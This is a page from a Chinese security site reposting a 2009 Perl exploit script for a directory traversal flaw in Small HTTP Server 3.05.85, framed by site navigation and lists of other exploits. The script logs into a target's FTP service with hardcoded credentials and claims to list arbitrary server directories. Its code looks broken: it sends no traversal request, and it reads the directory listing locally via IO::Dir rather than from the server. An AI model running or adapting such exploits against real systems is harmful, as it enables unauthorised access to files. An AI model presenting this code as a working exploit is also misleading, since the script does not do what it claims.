首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Small HTTP Server <= 3.05.85 Directory Traversal Exploit
来源:www.vfcocus.net 作者:Houssamix 发布时间:2009-02-03  

#!/usr/bin/perl
#
# Author : Houssamix

# Small HTTP Server <= 3.05.85 Directory Traversal Exploit

# Description : Any user FTP with low permission can have access to any directory in server

# Downlod : http://smallsrv.com/
# [01.01.09] Happy new year! Version 3.05.84

# Greetz to Legend-Spy , Stack , Snakespc , str0ke & ..

use LWP;
use Net::FTP;
use IO::Dir; 
use Tk;

if(@ARGV!=2){
    print "Author : Houssamix \n";
    print "Small HTTP Server <= 3.05.85 Directory Traversal Exploit\n";
    print "Usage: Hsmx.pl IP [dir_path] \n";
    print "Exam: Hsmx.pl 127.0.0.1 c:\\ \n\n";
    exit;
}

$ip = $ARGV[0];
$path = $ARGV[1];

my $username = "houssamix";
my $pass = "123456";
system("color f");

print "\n\n";
print "[+] Author : Houssamix\n";
print "[+] Small HTTP Server <= 3.05.85 Directory Traversal Exploit\n";
print "[+] Connect to $ip ...\n";
sleep(1);
$ftp = Net::FTP->new($ip, Debug => 0, Port => 21) || die "could not
connect: $!";

print "[+] Send user and pass..\n";

$ftp->login($username, $pass) || die "could not login: $!";
sleep(1);

print "[+] Logged in\n";
print "[+] Bad request sent \n\n";
sleep(1);

tie %dir, IO::Dir, $path;
foreach (keys %dir) {
print  $_, " => " , $dir{$_}->size, "\n";
}

$ftp->quit; 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Flatnux 2009-01-27 (Job fields
·Php168 v2008 权限提升漏洞
·Elecard AVC HD PLAYER (m3u/xpl
·MS09-001 SMB Dos Poc Exploit
·RealVNC 4.1.2 (vncviewer.exe)
·Jieqi cms v1.5 remote code exe
·phpBLASTER 1.0 RC1 (blaster_us
·Google Chrome 1.0.154.46 (Chro
·CMS Mini <= 0.2.2 Remote Comma
·Spider Player 2.3.9.5 (asx Fil
·eVision CMS 2.0 Remote Code Ex
·eVision CMS <= 2.0 (field) SQL
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved